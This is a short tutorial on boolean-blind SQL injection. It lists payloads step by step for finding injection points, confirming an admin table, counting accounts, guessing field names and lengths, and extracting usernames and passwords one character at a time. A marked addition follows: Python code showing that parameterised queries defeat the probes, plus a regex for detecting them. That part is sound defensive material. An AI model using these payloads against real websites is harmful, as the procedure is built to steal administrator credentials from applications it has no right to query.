1. Determine whether there are any injection points
; and 1=1 and 1=2
2. Guess the table name; it is usually nothing more than admin, adminuser, user, pass, password and so on.
and 0<> (SELECT COUNT (*) from *)
and 0<> (SELECT COUNT (*) from admin)---Determine whether the admin table exists
3. Guess the number of accounts: if 0< returns the correct page and 1< returns the error page, the number of accounts is 1.
and 0< (SELECT COUNT (*) from admin)
and 1< (SELECT COUNT (*) from admin)
4. Guess the field names: put the field name we think of inside the Len () parentheses.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)--
and 1= (SELECT COUNT (*) from admin where Len (name) >0)---user field name "name"
and 1= (SELECT COUNT (*) from admin where Len (password) >0)---password field name "password"
5. Guess the length of each field: change the >0 until it returns the correct page.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)
and 1= (SELECT COUNT (*) from admin where Len (name) >6)---error
and 1= (SELECT COUNT (*) from admin where Len (name) >5)---correct, so the length is 6
and 1= (SELECT COUNT (*) from admin where Len (name) =6)---correct
and 1= (SELECT COUNT (*) from admin where Len (password) >11)---correct
and 1= (SELECT COUNT (*) from admin where Len (password) >12)---error, so the length is 12
and 1= (SELECT COUNT (*) from admin where Len (password) =12)---correct
6. Guessing characters
and 1= (SELECT COUNT (*) from admin where left (name,1) =a)---Guess the first character of the user account
and 1= (SELECT COUNT (*) from admin where left (name,2) =ab)---Guess the first two characters of the user account
Just add one character at a time; once you have guessed as many characters as the length found above, the account name is known.
and 1= (select top 1 count (*) from Admin where ASC (mid (pass,5,1)) =51)--
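As an added example that is not part of the original page, the following Python (sqlite3) shows why the probes in steps 1 and 2 work and what stops them: a numeric id built by string concatenation changes its result page with each probe, while a bound parameter returns the same (empty) result for every probe; it also includes a simple pattern a log scan or WAF rule can use to flag such probes in parameters that should be plain numbers. The articles table, the sample rows and the regex are constructed assumptions.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the site's database (assumption: an articles
# table looked up by numeric id, plus the admin table the probes above ask about).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles VALUES (1, 'hello');
        CREATE TABLE admin(name TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin1', 'constructed-pw');
    """)
    return con

def lookup_vulnerable(con, article_id):
    # String concatenation: whatever follows the number is parsed as SQL.
    return [r[0] for r in con.execute("SELECT title FROM articles WHERE id=" + article_id)]

def lookup_safe(con, article_id):
    # Bound parameter: the whole string is one value and is never parsed as SQL.
    return [r[0] for r in con.execute("SELECT title FROM articles WHERE id=?", (article_id,))]

# The probes from steps 1 and 2 of the page, appended to a valid id.
PROBES = {
    "true": "1 and 1=1",
    "false": "1 and 1=2",
    "admin_exists": "1 and 0<(select count(*) from admin)",
}

def page_truth(lookup):
    # True when the query yields the "correct" page (a row), False on the error page.
    con = make_db()
    out = {}
    for label, payload in PROBES.items():
        try:
            out[label] = bool(lookup(con, payload))
        except sqlite3.Error:
            out[label] = False
    return out

# Detection side: boolean-blind probes share a shape that a WAF rule or log scan
# can match in query-string parameters that should only ever be numbers.
PROBE_RE = re.compile(r"\b(and|or)\b\s*\d+\s*(<>|[<=>])|\bselect\s+count\s*\(", re.I)

def looks_like_probe(value):
    return PROBE_RE.search(value) is not None
```

With the parameterised lookup every probe produces the same empty result, so the page no longer leaks the one bit per request that the whole procedure depends on.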
Standard SQL injection Statements